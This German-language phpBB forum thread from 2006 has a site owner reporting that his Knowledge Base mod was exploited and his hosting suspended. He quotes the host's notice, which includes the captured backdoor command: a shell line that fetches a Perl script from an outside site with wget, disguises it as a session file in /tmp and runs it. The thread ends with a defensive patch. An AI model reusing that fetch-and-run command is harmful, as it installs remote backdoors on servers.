Backdoor in Knowledge Base Mod ?

Beitrag von **redbull254** » 30.12.2006 13:25

Hallo,zusammen
ich habe mir die Knowledge Base Mod.. installiert. Läuft schon einige Tage, nun heute Nacht die komplette Abschaltung meines Webspace.

Begründung:

wir hatten ein Serverproblem, verursacht durch ihren Account. Dieser
wurde gesperrt. Mittlerweile konnten wir die Ursache ausfindig machen.
Auf dem web befindet sich eine Sicherheitslücke die ausgenutzt wurde um ein
Backdoor zu platzieren:

sh -c cd /tmp;wget http://www.husnaweb.com/borek.txt;mv borek.txt
sess_rdav631df3a1ddfaa34s1x1wwo521459;perl sess_r
/usr/lib/cgi-bin/php4 -c /etc/php4/cgi
/var/www/web184/html/phpBB2/includes/kb_constants.php

Wer kann mir dazu mehr Infos geben?

CorniI · Beitrag von **CorniI** » 30.12.2006 14:16

jop, siehe zB hier: http://www.phpbb2.de/ftopic38976.html Wird gerade aktiv exploitet

Beitrag von **redbull254** » 30.12.2006 14:42

na, Super

Klasse programmiert und toller Info Fluß.

Aggrocorni, ich Danke Dir für den Link.

Edit:

Forum nach Einbau von :

if ( !defined(’IN_PHPBB’) )
{
die(”Hacking attempt”);
}

wieder online.

Und für alle, die auch Probleme befürchten:

http://www.phpbb2.de/rlink/rlink.php?ur ... k.de/?p=33